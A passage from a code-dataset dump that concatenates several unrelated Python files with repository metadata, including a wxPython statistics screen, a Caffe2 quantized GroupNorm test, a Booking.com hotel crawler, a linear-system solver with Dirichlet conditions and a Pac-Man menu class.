        # Return a fresh, empty instance of this font class (used by copy machinery).
        return TrueTypeFont()
    def __deepcopy__(self, memodict={}):
        """Deep-copy this font, re-tagging the Subtype and duplicating the
        per-font CID<->unicode lookup tables so the copy is independent."""
        # fmt: off
        f_out: TrueTypeFont = super(TrueTypeFont, self).__deepcopy__(memodict)
        f_out[Name("Subtype")] = Name("TrueType")
        f_out._character_identifier_to_unicode_lookup: typing.Dict[int, str] = {k: v for k, v in self._character_identifier_to_unicode_lookup.items()}
        f_out._unicode_lookup_to_character_identifier: typing.Dict[str, int] = {k: v for k, v in self._unicode_lookup_to_character_identifier.items()}
        return f_out
    # fmt: on
| [
"trevordino@gmail.com"
] | trevordino@gmail.com |
0fd9070e7532c771b9766a91098a73150dfb5d01 | d308fffe3db53b034132fb1ea6242a509f966630 | /pirates/leveleditor/worldData/shipUndeadInterceptor3.py | acc6d9d173dd1413dd886408aaa47773ffbce77e | [
"BSD-3-Clause"
] | permissive | rasheelprogrammer/pirates | 83caac204965b77a1b9c630426588faa01a13391 | 6ca1e7d571c670b0d976f65e608235707b5737e3 | refs/heads/master | 2020-03-18T20:03:28.687123 | 2018-05-28T18:05:25 | 2018-05-28T18:05:25 | 135,193,362 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 3,664 | py | # uncompyle6 version 3.2.0
# Python bytecode 2.4 (62061)
# Decompiled from: Python 2.7.14 (v2.7.14:84471935ed, Sep 16 2017, 20:19:30) [MSC v.1500 32 bit (Intel)]
# Embedded file name: pirates.leveleditor.worldData.shipUndeadInterceptor3
from pandac.PandaModules import Point3, VBase3, Vec4, Vec3
objectStruct = {'Objects': {'1189043800.81gjeon': {'Type': 'Ship Part', 'Name': 'shipNavyInterceptor3', 'Category': '38: Phantom', 'File': '', 'Flagship': True, 'LogoOverride': '-1: Default', 'Objects': {'1255998720.0jubutler': {'Type': 'Spawn Node', 'AnimSet': 'default', 'AuraFX': 'None', 'Hpr': Point3(0.0, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': '100', 'Pause Duration': '30', 'Pos': Point3(1.543, -17.163, 22.11), 'PoseAnim': '', 'PoseFrame': '', 'PropFXLeft': 'None', 'PropFXRight': 'None', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Area', 'Start State': 'Patrol', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}, 'spawnTimeBegin': 0.0, 'spawnTimeEnd': 0.0}, '1255998848.0jubutler': {'Type': 'Movement Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pause Chance': '100', 'Pause Duration': '30', 'Pos': Point3(18.012, 9.63, 23.531), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Color': (0.65, 0, 0, 1), 'Model': 'models/misc/smiley'}}, '1255998848.0jubutler0': {'Type': 'Movement Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pause Chance': '100', 'Pause Duration': '30', 'Pos': Point3(-14.636, 3.658, 23.536), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Color': (0.65, 0, 0, 1), 'Model': 'models/misc/smiley'}}, '1255998848.0jubutler1': {'Type': 'Movement Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pause Chance': '100', 'Pause Duration': '30', 'Pos': Point3(-12.938, -34.07, 22.156), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Color': (0.65, 0, 0, 1), 'Model': 'models/misc/smiley'}}, '1255998848.0jubutler2': {'Type': 'Movement Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pause Chance': '100', 'Pause Duration': '30', 'Pos': Point3(14.147, -35.882, 22.071), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Color': (0.65, 0, 0, 1), 'Model': 
'models/misc/smiley'}}}, 'Respawns': True, 'StyleOverride': '-1: Default', 'Team': 'EvilNavy', 'Visual': {'Model': ['models/shipparts/interceptorL3-geometry_High', 'models/shipparts/interceptorL3-collisions']}}}, 'Node Links': [['1255998720.0jubutler', '1255998848.0jubutler0', 'Bi-directional'], ['1255998720.0jubutler', '1255998848.0jubutler', 'Bi-directional'], ['1255998848.0jubutler', '1255998848.0jubutler0', 'Bi-directional'], ['1255998848.0jubutler0', '1255998848.0jubutler1', 'Bi-directional'], ['1255998848.0jubutler', '1255998848.0jubutler2', 'Bi-directional'], ['1255998848.0jubutler1', '1255998848.0jubutler2', 'Bi-directional']], 'Layers': {}, 'ObjectIds': {'1189043800.81gjeon': '["Objects"]["1189043800.81gjeon"]', '1255998720.0jubutler': '["Objects"]["1189043800.81gjeon"]["Objects"]["1255998720.0jubutler"]', '1255998848.0jubutler': '["Objects"]["1189043800.81gjeon"]["Objects"]["1255998848.0jubutler"]', '1255998848.0jubutler0': '["Objects"]["1189043800.81gjeon"]["Objects"]["1255998848.0jubutler0"]', '1255998848.0jubutler1': '["Objects"]["1189043800.81gjeon"]["Objects"]["1255998848.0jubutler1"]', '1255998848.0jubutler2': '["Objects"]["1189043800.81gjeon"]["Objects"]["1255998848.0jubutler2"]'}}
extraInfo = {'camPos': Point3(-173.398, -66.2502, 103.662), 'camHpr': VBase3(-74.1058, -20.5578, 0), 'focalLength': 1.39999997616, 'skyState': 2, 'fog': 0} | [
"33942724+itsyaboyrocket@users.noreply.github.com"
] | 33942724+itsyaboyrocket@users.noreply.github.com |
20b37e12c5d794237c6afff252c604939a813a3d | 8a36a30ab0fec1a676b5dbbee3677261acae7e7d | /Executable/Source (alle code)/Statistiekscherm.py | e77b72c006f5b81d85e5f9e4598c01687f81a371 | [] | no_license | sdevriend/WieHaaltErKoffie | d63781c69d51708c9c7b570c955e81affa47a6e6 | 2655bf2fb8ec9497c1b1ebb7db57458476d4640c | refs/heads/master | 2020-05-20T19:24:39.889639 | 2016-01-24T15:46:03 | 2016-01-24T15:46:03 | 46,859,153 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,999 | py | #!/usr/bin/env python
# -*- coding: CP1252 -*-
import wx
import gettext
import shutil
import time
import pylab
from creation import Creation
import os
from BakkieControlDatabase import BakkieControlDatabase
class Stats(wx.Frame):
    """wx frame that renders drink/payment statistics as a matplotlib chart.

    The chart is written by ``Creation`` to ``temp.png`` and displayed as a
    static bitmap; two list boxes choose the users and the statistic, a radio
    box chooses bar vs. pie chart.
    """
    def __init__(self, *args, **kwds):
        # Remove a stale chart image from a previous session, if any.
        if os.path.isfile("temp.png"):
            os.remove("temp.png")
            #print "BESTAAT"
        self.locale = wx.Locale(wx.LANGUAGE_ENGLISH)
        kwds["style"] = wx.DEFAULT_FRAME_STYLE
        wx.Frame.__init__(self, *args, **kwds)
        self.SetBackgroundColour((92,48,0))
        # "Opslaan" = save, "Terug" = back (UI strings are Dutch).
        self.savebutton = wx.Button(self, wx.ID_ANY, "Opslaan")
        self.backbutton = wx.Button(self, wx.ID_ANY, "Terug")
        self.backbutton.Bind(wx.EVT_BUTTON, self.onBack)
        self.savebutton.Bind(wx.EVT_BUTTON, self.onSave)
        self.radio_box_1 = wx.RadioBox(self, wx.ID_ANY, ("Soort grafiek"), choices=[("Bar"), ("Circle")], majorDimension=1, style=wx.RA_SPECIFY_ROWS)
        # Prepare a square matplotlib figure; Creation draws into it.
        pylab.figure(1, figsize=(6,6))
        ax = pylab.axes([0.1, 0.1, 0.8, 0.8])
        #names = ["Peter","John","James","Mark","Bart","Jude","Andrew","Simon"]
        self.data = [0]
        names= [""]
        title = "Placeholder title"
        self.graph = Creation(names, self.data, title)
        #self.graph.buildBar()
        perf_plot = 'temp.png'
        names = self.getNames()
        # Multi-select user list; entry 0 is the 'iedereen' (everyone) pseudo-user.
        self.list_box_3 = wx.ListBox(self, wx.ID_ANY, choices=names,
                                     style=wx.LB_MULTIPLE)
        # Statistic selector (Dutch): who fetches most / biggest debtor /
        # most-fetched drinks / most generous lender.
        self.list_box_2 = wx.ListBox(self, wx.ID_ANY, choices=[("Wie haalt het vaakst?"), ("Wie is de grootste wanbetaler?"),
            ("Welke dranken worden het meest gehaald?"), ("Wie geeft het gulst?")])
        self.radio_box_1.Bind(wx.EVT_RADIOBOX, self.onChange)
        self.list_box_2.Bind(wx.EVT_LISTBOX, self.onUpdateData)
        self.list_box_3.Bind(wx.EVT_LISTBOX, self.onUpdateNames)
        sel = self.radio_box_1.GetSelection()
        ##print self.radio_box_1.GetString(sel)
        self.__set_properties()
        # Render an initial chart before first display.
        self.onUpdateNames(wx.EVT_LISTBOX)
        self.onUpdateData(wx.EVT_LISTBOX)
        self.__do_layout()
    def onSave(self, event):
        # Copy the current chart to a timestamped PNG next to the app.
        newname = str(time.strftime("%y_%m_%d_%H_%M_%S"))
        newname+=".png"
        shutil.copy("temp.png",newname)
    def onBack(self, event):
        # Hide (not destroy) so the parent can re-show the frame later.
        self.Hide()
    def getNames(self):
        """Return ['iedereen'] + all user names from the database."""
        self.db = BakkieControlDatabase()
        namelist = self.db.getUsers()
        ##print namelist
        newnames = ['iedereen']
        for tup in namelist:
            # NOTE(review): assumes tup[1] is the user's display name — verify schema.
            newnames.append(tup[1])
        return newnames
    def onUpdateNames(self, event):
        # Selection changed: refresh names, data, then redraw the chart.
        self.updateNames()
        self.onUpdateData(wx.EVT_LISTBOX)
        self.onChange(wx.EVT_RADIOBOX)
    def updateNames(self):
        """Push the currently selected user names into the graph object."""
        selected = self.list_box_3.GetSelections()
        if selected[0] == 0:
            # 'iedereen' selected: select every user, then drop the pseudo-entry.
            ##print "IEDEREEN"
            for name in range(self.list_box_3.GetCount()):
                self.list_box_3.Select(name)
                ##print name
            selected = self.list_box_3.GetSelections()[1:]
        newnames = []
        for selection in selected:
            newnames.append(str(self.list_box_3.GetString(selection)))
        ##print newnames
        self.graph.setNames(newnames)
        ##print self.graph.getNames()
        # Trim the data series to match the number of selected names.
        data = self.graph.getData()
        self.graph.setData(data[:len(newnames)])
        #self.__do_layout()
    def onUpdateData(self, event):
        """Fetch the data series for the selected statistic and redraw."""
        self.updateNames()
        stat = self.list_box_2.GetSelection()
        names = self.graph.getNames()
        ##print stat
        if stat == 0:
            # Fetch frequency per user; align values with the selected names,
            # defaulting to 0 for users without data.
            freqs = self.db.getUserFreqs()
            data_names = []
            data_nums= []
            newdata = []
            for tup in freqs:
                data_names.append(tup[0])
                data_nums.append(tup[1])
            ##print data_names , "D_N"
            newdata = []
            for name in names:
                if name in data_names:
                    namenum = data_names.index(name)
                    newdata.append(data_nums[namenum])
                else:
                    newdata.append(0)
        elif stat == 1:
            # Outstanding debt per user.
            debt = self.db.getUserSchulden()
            #print debt
            data_names = []
            data_nums = []
            newdata = []
            for tup in debt:
                data_names.append(tup[0])
                data_nums.append(tup[1])
            for name in names:
                if name in data_names:
                    namenum = data_names.index(name)
                    newdata.append(data_nums[namenum])
                else:
                    newdata.append(0)
        elif stat == 2:
            # Drink popularity: labels are drink names, not users.
            freqs = self.db.getFrequenties()
            data_drinks = []
            data_nums = []
            newdata = []
            for tup in freqs:
                data_drinks.append(tup[0])
                data_nums.append(tup[1])
            self.graph.setNames(data_drinks)
            newdata = data_nums
        elif stat == 3:
            # Amount lent out per user.
            loan = self.db.getOpenstaand()
            #print loan
            data_names = []
            data_nums = []
            newdata = []
            for tup in loan:
                data_names.append(tup[0])
                data_nums.append(tup[1])
            for name in names:
                if name in data_names:
                    namenum = data_names.index(name)
                    newdata.append(data_nums[namenum])
                else:
                    newdata.append(0)
        #print self.graph.getData(),"ervoor"
        self.graph.setData(newdata)
        self.graph.setTitle(str(self.list_box_2.GetString(stat)))
        #print self.graph.getData(),"erna"
        self.onChange(wx.EVT_RADIOBOX)
    def onChange(self, event):
        # Rebuild the chart image in the style chosen in the radio box.
        graphtype = self.radio_box_1.GetString(self.radio_box_1.GetSelection())
        if graphtype == "Circle":
            self.graph.buildPie()
        elif graphtype == "Bar":
            self.graph.buildBar()
        self.__do_layout()
    def __set_properties(self):
        self.SetTitle(("Statistieken"))
        self.SetSize((900, 675))
        self.radio_box_1.SetSelection(0)
        self.list_box_3.SetSelection(0)
        self.list_box_2.SetSelection(0)
        #self.radio_box_1.SetBackgroudColour((46,24,0))
    def __do_layout(self):
        # Reload the freshly written chart PNG and rebuild the sizer tree.
        self.image = wx.Image("temp.png")
        self.image.Rescale(666,500)
        image2 = wx.Bitmap(self.image)
        self.bitmap_1 = wx.StaticBitmap(self, wx.ID_ANY, image2)
        sizer_1 = wx.BoxSizer(wx.VERTICAL) #sizers
        sizer_3 = wx.BoxSizer(wx.HORIZONTAL) # list boxes1
        sizer_2 = wx.BoxSizer(wx.VERTICAL) #Radiobox, bitmap
        sizer_4 = wx.BoxSizer(wx.HORIZONTAL) # Radiobox, buttons
        sizer_5 = wx.BoxSizer(wx.HORIZONTAL) #Butons
        sizer_4.Add(self.radio_box_1, 2, wx.EXPAND, 0)
        sizer_4.Add(sizer_5, 1, wx.EXPAND, 0)
        sizer_5.Add(self.backbutton, 1, wx.EXPAND, 0)
        sizer_5.Add(self.savebutton, 1, wx.EXPAND, 0)
        sizer_2.Add(sizer_4, 1, wx.EXPAND, 0)
        sizer_2.Add(self.bitmap_1, 0, wx.EXPAND | wx.ALIGN_CENTER_HORIZONTAL | wx.ALIGN_CENTER_VERTICAL, 0)
        sizer_1.Add(sizer_2, 1, wx.EXPAND, 0)
        sizer_3.Add(self.list_box_3, 1, wx.EXPAND, 0)
        sizer_3.Add(self.list_box_2, 1, wx.EXPAND, 0)
        sizer_1.Add(sizer_3, 1, wx.EXPAND, 0)
        self.SetSizer(sizer_1)
        self.Layout()
if __name__ == "__main__":
    # Stand-alone entry point: run the statistics frame in its own wx app.
    gettext.install("app")
    app = wx.App(0)
    wx.InitAllImageHandlers()
    frame_1 = Stats(None, wx.ID_ANY, "")
    app.SetTopWindow(frame_1)
    frame_1.Show()
    app.MainLoop()
| [
"s1082434@student.hsleiden.nl"
] | s1082434@student.hsleiden.nl |
878597de95a64033248db2cb30ff1f88acb2fabc | 46c3fe721977e4626658b802ef1b6c25853b709a | /String validators.py | 559d24860c983e1bf0ad0013eb9c58b66d2daa47 | [] | no_license | rishabhgupta03/Hacker-Rank-python | 97decac9c3f91c98908085482fdf2ae9a55fe02a | fc74e6ffe5905cc0c985520f0e8a766f54241424 | refs/heads/master | 2022-11-27T18:51:29.202123 | 2020-07-16T16:46:01 | 2020-07-16T16:46:01 | 266,185,486 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 196 | py | s=input()
print (any(i.isalnum() for i in s))
print (any(i.isalpha() for i in s))
print (any(i.isdigit() for i in s))
print (any(i.islower() for i in s))
print (any(i.isupper() for i in s))
| [
"noreply@github.com"
] | rishabhgupta03.noreply@github.com |
106b49f1d09d2c07ec615d4ff6eada48156bac0f | ed3c924c42baa3ab825a482efc15f85a32c06eaa | /boj16649.py | 471eee9a27c32f61b4009e52d88b52912bb2b19c | [] | no_license | JoinNova/baekjoon | 95e94a7ccae51103925e515d765ebda7b6fffeed | 33b900696ecf2a42b8e452fdeae6ee482143e37e | refs/heads/master | 2020-04-16T22:25:31.577968 | 2019-04-28T04:25:24 | 2019-04-28T04:25:24 | 165,966,949 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 469 | py | #boj16649 Building a Stair
def stair(cube):
cnt=cube
row=(cube+1)//2
print(row+1)
pic='.'*(row+1)+'\n'
for i in range(row):
for j in range(row):
if j==0 or i==row-1:
pic+='o';cnt-=1
elif cube%2==0 and i==row-2 and j==1:
pic+='o';cnt-=1;
else:
pic+='.'
pic+='.\n'
print(pic.strip())
#print(cnt)
# Read the number of cubes; a staircase of exactly 2 cubes is impossible.
n=int(input())
if n==2:print(-1)
else:stair(n)
| [
"noreply@github.com"
] | JoinNova.noreply@github.com |
3f861b0b4904d9b72b34ade2c2fae8f9932ec493 | eb9f655206c43c12b497c667ba56a0d358b6bc3a | /python/testData/inspections/GoogleDocStringRemoveKeywordVararg.py | 2ff1604bc7d53ec8b7c1992b258b97e54edb35a8 | [
"Apache-2.0"
] | permissive | JetBrains/intellij-community | 2ed226e200ecc17c037dcddd4a006de56cd43941 | 05dbd4575d01a213f3f4d69aa4968473f2536142 | refs/heads/master | 2023-09-03T17:06:37.560889 | 2023-09-03T11:51:00 | 2023-09-03T12:12:27 | 2,489,216 | 16,288 | 6,635 | Apache-2.0 | 2023-09-12T07:41:58 | 2011-09-30T13:33:05 | null | UTF-8 | Python | false | false | 57 | py | def f():
"""
Args:
**kwar<caret>gs:
""" | [
"mikhail.golubev@jetbrains.com"
] | mikhail.golubev@jetbrains.com |
65e9e8ebbf9a9682f5fb9acfd790fad23e123824 | 99e44f844d78de330391f2b17bbf2e293bf24b1b | /pytorch/caffe2/quantization/server/group_norm_dnnlowp_op_test.py | b6acc900437ce89c4bd5c4ea17a400c9b8d47839 | [
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"Apache-2.0",
"BSD-2-Clause",
"MIT"
] | permissive | raghavnauhria/whatmt | be10d57bcd6134dd5714d0c4058abd56a1b35a13 | c20483a437c82936cb0fb8080925e37b9c4bba87 | refs/heads/master | 2022-12-04T05:39:24.601698 | 2019-07-22T09:43:30 | 2019-07-22T09:43:30 | 193,026,689 | 0 | 1 | MIT | 2022-11-28T17:50:19 | 2019-06-21T03:48:20 | C++ | UTF-8 | Python | false | false | 4,517 | py | from __future__ import absolute_import, division, print_function, unicode_literals
import collections
import caffe2.python.hypothesis_test_util as hu
import hypothesis.strategies as st
import numpy as np
from caffe2.python import core, dyndep, utils, workspace
from caffe2.quantization.server import utils as dnnlowp_utils
from dnnlowp_test_utils import check_quantized_results_close
from hypothesis import given
dyndep.InitOpsLibrary("//caffe2/caffe2/quantization/server:dnnlowp_ops")
workspace.GlobalInit(["caffe2", "--caffe2_omp_num_threads=11"])
class DNNLowPOpGroupNormTest(hu.HypothesisTestCase):
    """Property-based test comparing fp32 GroupNorm against its DNNLOWP
    quantized variants; the three engine/op combinations must agree within
    quantization tolerance."""
    @given(
        N=st.integers(1, 4),
        G=st.integers(2, 4),
        K=st.integers(2, 12),
        H=st.integers(4, 16),
        W=st.integers(4, 16),
        order=st.sampled_from(["NCHW", "NHWC"]),
        in_quantized=st.booleans(),
        out_quantized=st.booleans(),
        weight_quantized=st.booleans(),
        **hu.gcs_cpu_only
    )
    def test_dnnlowp_group_norm(
        self,
        N,
        G,
        K,
        H,
        W,
        order,
        in_quantized,
        out_quantized,
        weight_quantized,
        gc,
        dc,
    ):
        # C channels split into G groups of K channels each.
        C = G * K
        X = np.random.rand(N, C, H, W).astype(np.float32) * 5.0 - 1.0
        if order == "NHWC":
            X = utils.NCHW2NHWC(X)
        gamma = np.random.rand(C).astype(np.float32) * 2.0 - 1.0
        beta = np.random.randn(C).astype(np.float32) - 0.5
        Output = collections.namedtuple("Output", ["Y", "op_type", "engine"])
        outputs = []
        # fp32 reference first, then the two quantized variants.
        op_engine_list = [
            ("GroupNorm", ""),
            ("GroupNorm", "DNNLOWP"),
            ("Int8GroupNorm", "DNNLOWP"),
        ]
        for op_type, engine in op_engine_list:
            net = core.Net("test_net")
            do_quantize = "DNNLOWP" in engine and in_quantized
            do_dequantize = "DNNLOWP" in engine and out_quantized
            # Weight quantization needs the fp32 output range, so it only
            # applies once the reference run (outputs[0]) exists.
            do_quantize_weight = (
                engine == "DNNLOWP" and weight_quantized and len(outputs) > 0
            )
            if do_quantize:
                quantize = core.CreateOperator(
                    "Quantize", ["X"], ["X_q"], engine=engine, device_option=gc
                )
                net.Proto().op.extend([quantize])
            if do_quantize_weight:
                # Pre-quantize gamma, and quantize beta with the combined
                # input/gamma scales as required for int8 bias.
                int8_given_tensor_fill, gamma_q_param = dnnlowp_utils.create_int8_given_tensor_fill(
                    gamma, "gamma_q"
                )
                net.Proto().op.extend([int8_given_tensor_fill])
                X_q_param = dnnlowp_utils.choose_quantization_params(X.min(), X.max())
                int8_bias_tensor_fill = dnnlowp_utils.create_int8_bias_tensor_fill(
                    beta, "beta_q", X_q_param, gamma_q_param
                )
                net.Proto().op.extend([int8_bias_tensor_fill])
            group_norm = core.CreateOperator(
                op_type,
                [
                    "X_q" if do_quantize else "X",
                    "gamma_q" if do_quantize_weight else "gamma",
                    "beta_q" if do_quantize_weight else "beta",
                ],
                ["Y_q" if do_dequantize else "Y"],
                dequantize_output=0 if do_dequantize else 1,
                group=G,
                order=order,
                is_test=True,
                engine=engine,
                device_option=gc,
            )
            if do_quantize_weight:
                # When quantized weight is provided, we can't rescale the
                # output dynamically by looking at the range of output of each
                # batch, so here we provide the range of output observed from
                # fp32 reference implementation
                dnnlowp_utils.add_quantization_param_args(group_norm, outputs[0][0])
            net.Proto().op.extend([group_norm])
            if do_dequantize:
                dequantize = core.CreateOperator(
                    "Dequantize", ["Y_q"], ["Y"], engine=engine, device_option=gc
                )
                net.Proto().op.extend([dequantize])
            # Feed inputs, run the net, and collect Y for cross-engine comparison.
            self.ws.create_blob("X").feed(X, device_option=gc)
            self.ws.create_blob("gamma").feed(gamma, device_option=gc)
            self.ws.create_blob("beta").feed(beta, device_option=gc)
            self.ws.run(net)
            outputs.append(
                Output(Y=self.ws.blobs["Y"].fetch(), op_type=op_type, engine=engine)
            )
        check_quantized_results_close(outputs, atol_scale=2.0)
| [
"rnauhria@gmail.com"
] | rnauhria@gmail.com |
ac08339f54af9d89f25a52c9f16329136ab711df | 5dd5828ae5c021ebe41348dfbaf1a1aa38319177 | /crawler/booking/crawler.py | c17ca545224b54836a4bfb2addf3e707cde79005 | [] | no_license | whoait/crawldata | 9655bab7d237f7ac3b448dc8735077545878f528 | 7943d47ed1b141808c971265d77018f9da8eed02 | refs/heads/master | 2020-04-11T04:06:56.573595 | 2015-08-21T08:19:23 | 2015-08-21T08:19:23 | 161,501,744 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,811 | py | """
Base Crawler Rules
Rules help the crawler locate links in webpages
"""
import time
from datetime import datetime, timedelta
from selenium import webdriver
from BeautifulSoup import BeautifulSoup
import urllib2
import requests
import json
from ..base.crawler import BaseCrawler
from ..string_util import setuplogger
class BookingCrawler(BaseCrawler):
    """Crawler that scrapes hotel listing URLs from Booking search pages
    and caches them in a MongoDB collection (``hotel_url``)."""
    def __init__(self, site_base_url, mongodb):
        self.site_base_url = site_base_url
        self.logger = setuplogger(loggername='booking_crawler')
        self.driver = None
        self.hotels_per_page =15
        self.db = mongodb
    def __del__(self):
        # self.driver.quit().
        pass
    # returns list of URLs of all hotels to parse
    # expected contents of meta_dict:
    # - full_name (of city)
    # - city_ID (tripadvisor)
    # - country (name)
    # NOTE(review): mutable default argument; harmless here since it is
    # never mutated, but consider `metadata_dict=None`.
    def crawl_hotels(self, base_url, metadata_dict={}):
        """Follow the search result pagination from `base_url` and return a
        list of {url, hotel_id, source} dicts, one per listed hotel."""
        hotel_dict_list = []
        hotel_limit = -1
        page_count = 1
        tries = 0
        max_tries = 3
        search_url = base_url
        while True:
            # NOTE(review): bare except — any failure (network, parse) ends
            # the pagination loop silently.
            try:
                soup = BeautifulSoup(
                    requests.get(search_url).text)
            except:
                self.logger.info("cannot retrieve page - exiting")
                break
            self.logger.info("parsing list of hotels from {0}".format(search_url))
            for listing in soup.find(id="hotellist_inner").findAll("div", "sr_item clearfix"):
                try:
                    # Hotel detail link without query string, made absolute.
                    url = self.site_base_url + listing.find("h3").find("a")['href'].split("?")[0]
                    hotel_id = listing["data-hotelid"]
                    hotel_dict_list.append({
                        "url": url,
                        "hotel_id": hotel_id,
                        "source": "Booking"
                    })
                except:
                    self.logger.info("No url present in listing {0}".format(listing))
            # look for next page url
            if soup.find("a", "paging-next"):
                search_url = soup.find("a", "paging-next")['href']
            else:
                break
        self.logger.info("hotel url list has {0} entries".format(len(hotel_dict_list)))
        return hotel_dict_list
    def get_hotels(self, base_url, metadata_dict={}):
        """Return cached Booking hotel URLs; crawl and populate the cache
        the first time (when the collection has no Booking entries)."""
        if self.db.hotel_url.find({'source': 'Booking'}).count() == 0:
            hotel_dict_list = self.crawl_hotels(base_url, metadata_dict)
            for item in hotel_dict_list:
                self.db.hotel_url.insert(item)
        return list(self.db.hotel_url.find(
            {'source': 'Booking'},
            {'url': 1, 'hotel_id': 1}))
    # we will use json to crawl the reviews.
    # :return - max int - page number
    def crawl_reviews(self, base_url, metadata_dict):
        # Not implemented yet for Booking.
        return None
| [
"heroitsme@gmail.com"
] | heroitsme@gmail.com |
5d5f8447dfe2cd287eede766f94ffe04e154a4ab | 908c89f2d28df0ebbbdb15895efd5087aaf7e914 | /stuff/lectureCode/Python/solveq.py | b1ac07bd92b559650061085e56a3a8d3fac3b0ee | [
"MIT"
] | permissive | kit-ifm/moofeKIT | 1f1ae137f5345303c3fa0e29aaa70b697173fae6 | e999ce25b7e37ae35439c43c988b54df3de93055 | refs/heads/main | 2023-04-09T12:49:58.331894 | 2022-09-29T15:21:50 | 2022-09-29T15:21:50 | 536,644,907 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,224 | py | import numpy as np
#from scipy.sparse.linalg import spsolve
from scikits.umfpack import spsolve, splu
def solveq(K, F, bc):
    ## Solve the linear system of equations, taking Dirichlet boundary
    ## conditions into account.
    #
    # q = solveq(K,F,bc)
    #
    # q: solution vector
    # K: stiffness matrix
    # F: load vector
    # bc: Dirichlet degrees of freedom
    #
    # bc = [idxDiri1 valueDiri1
    #       idxDiri2 valueDiri2
    #       :
    #       idxDiriN valueDiriN]
    if bc.size != 0:
        # Read the inputs; bc indices are 1-based, convert to 0-based.
        dofDiri = (bc[:, 0] - np.ones(bc[:, 0].shape)).astype('i')
        qDiri = bc[:, 1]
        # Mark the degrees of freedom that carry a Dirichlet boundary.
        nDof = np.size(F)
        DOSOLVE = np.full(nDof, True)
        DOSOLVE[dofDiri] = False
        # Solve only for the free (non-Dirichlet) degrees of freedom: the
        # prescribed values are moved to the right-hand side, then written
        # directly into the solution vector.
        q = np.zeros(np.shape(K)[0])
        q[DOSOLVE] = spsolve(K[np.ix_(DOSOLVE, DOSOLVE)], F[DOSOLVE] - np.atleast_2d(K[np.ix_(DOSOLVE, np.logical_not(DOSOLVE))] @ qDiri).T)
        q[np.logical_not(DOSOLVE)] = qDiri
    else:
        # No boundary conditions given: solve for all values directly.
        q = np.linalg.solve(K, F)
    return q
| [
"marlon.franke@kit.edu"
] | marlon.franke@kit.edu |
26f2a0c1553f577042410902902d21b7314ccb2a | 4835164a9fd8bd6a3c58ecb698e06fbda9527a1d | /venv/mainMenu.py | 5a7f0d3c9ec3343ddbb7794dfb911e5bb48f58c4 | [] | no_license | Kaine-R/Pac-Man | 15fb99e9df3d6b0956b09729b4f14054c1135799 | 06c8de255b8f4de28dc8d55938a0e307c209aa19 | refs/heads/master | 2020-04-01T22:49:39.203774 | 2018-10-19T04:55:25 | 2018-10-19T04:55:25 | 153,728,559 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,200 | py | import pygame
import pygame.font
from introduceGhosts import IntroGhosts
class Menu():
    """Pac-Man main menu: animated title screen with a Pac-Man chase
    animation, plus an optional high-score view."""
    def __init__(self, screen, settings):
        self.screen, self.settings = screen, settings
        self.names = IntroGhosts(screen, settings)
        # High-score table, kept sorted descending with a fixed length.
        self.scores = [50000, 30000, 10000, 5000, 2000, 1000, 500, 300, 200, 100, 0]
        self.font = pygame.font.SysFont(None, 80, True, True)
        self.smallFont = pygame.font.SysFont(None, 48)
        self.title = self.font.render("PACMAN", True, (250, 250, 250))
        self.titleRect = self.title.get_rect()
        self.titleRect.x, self.titleRect.y = 2* settings.screenWidth /7, settings.screenHeight /9
        self.bg = (0, 0, 0)
        # Frame counter driving the mouth animation (wraps at 900).
        self.timer = 0
        # When True, blit() shows the high-score list instead of the animation.
        self.showHS = False
        self.pacImage = [pygame.image.load("image/pacman3.png"), pygame.image.load("image/pacman2.png"), pygame.image.load("image/pacman1.png")]
        self.pacRect = self.pacImage[0].get_rect()
        # Pac-Man starts off-screen to the left, moving right.
        self.pacRect.x, self.pacRect.y = - settings.screenWidth /4, settings.screenHeight /3
        self.pacDirection = 1
        self.allGhostImage = pygame.image.load("image/ghostAll.png")
        self.allGhostBlueImage = pygame.image.load("image/ghostAllBlue.png")
        self.allEyesImage = pygame.image.load("image/eyeAll.png")
        self.allEyesRect = self.allEyesImage.get_rect()
        self.allEyesRect.x, self.allEyesRect.y = - settings.screenWidth /2, settings.screenHeight /3 + 10
        self.allGhostRect = self.allGhostImage.get_rect()
        self.allGhostRect.x, self.allGhostRect.y = - settings.screenWidth /2, settings.screenHeight /3
    def checkShowHS(self, tempBool):
        # Toggle between the animation and the high-score view.
        self.showHS = tempBool
    def update(self):
        """Advance the animation one frame: move sprites, flip direction at
        the screen edges."""
        if self.timer > 900:
            self.timer = 0
        else:
            self.timer += 1
        self.pacRect.x += 2 * self.pacDirection
        self.allGhostRect.x += 2 * self.pacDirection
        self.allEyesRect.x += 2 * self.pacDirection
        if self.pacRect.x >= self.settings.screenWidth *2:
            # Far right: turn around; the chase reverses (ghosts flee).
            self.pacDirection = -1
            self.flipPac()
            self.allEyesImage = pygame.transform.flip(self.allEyesImage, True, False)
        elif self.pacRect.x <= 0 - self.settings.screenWidth:
            self.pacDirection = 1
            self.flipPac()
            self.allEyesImage = pygame.transform.flip(self.allEyesImage, True, False)
    def flipPac(self):
        # Mirror all three mouth frames horizontally.
        self.pacImage[0] = pygame.transform.flip(self.pacImage[0], True, False)
